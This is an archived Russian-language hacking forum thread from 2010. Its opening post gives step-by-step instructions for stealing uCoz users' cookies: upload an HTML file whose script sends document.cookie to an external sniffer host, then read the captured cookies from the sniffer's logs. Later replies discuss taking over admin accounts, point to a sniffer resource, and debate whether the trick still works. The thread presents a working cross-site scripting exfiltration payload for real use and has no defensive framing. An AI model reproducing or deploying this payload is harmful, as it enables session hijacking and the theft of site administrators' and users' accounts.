А вот и долгожданный Ucoz [Архив]

Просмотр полной версии : А вот и долгожданный Ucoz

Dr..VATSON

18.03.2010, 01:50

Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

Тырим куки в Ucoz

1) создаём фйлик html вписываем код который тырит куки

<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>

2) Загружаем наш html файлик через "Обзор"

Смотрим скрин (http://www.onlinedisk.ru/view/381778)

4) Должно получиться примерно так когда файлик загружен

Смотрим скрин (http://www.onlinedisk.ru/view/381779)

5) Смотрим логи на сниффере (у меня свой сниффер)

Смотрим скрин (http://www.onlinedisk.ru/view/381793)

Ну вот и всё...

general.fox

26.03.2010, 09:56

На UcoZе куки Админов привязаны к IP.

general.fox

26.03.2010, 09:58

Хотя может я ошибаюсь...

Koder45ru

04.04.2010, 17:16

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..

Rejiser

05.04.2010, 23:03

Хех где то похожее читал ток там через чат можно админку на укозе утащить..

не подскажешь где читал?)

sparrow3000

06.04.2010, 07:52

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..
если про бесцветный смайлик со скриптом то это не пашет уже :D

[Feldmarschall]

09.04.2010, 05:14

не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде

NeoX

14.05.2010, 12:06

еще актуально?

niva622

16.05.2010, 22:56

еще актуально, но на некоторых сайтах запрещено добавлять html файлы..

26.05.2010, 16:48

Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.

shell_c0de

26.05.2010, 17:23

уже не катит этот вариант ....имхо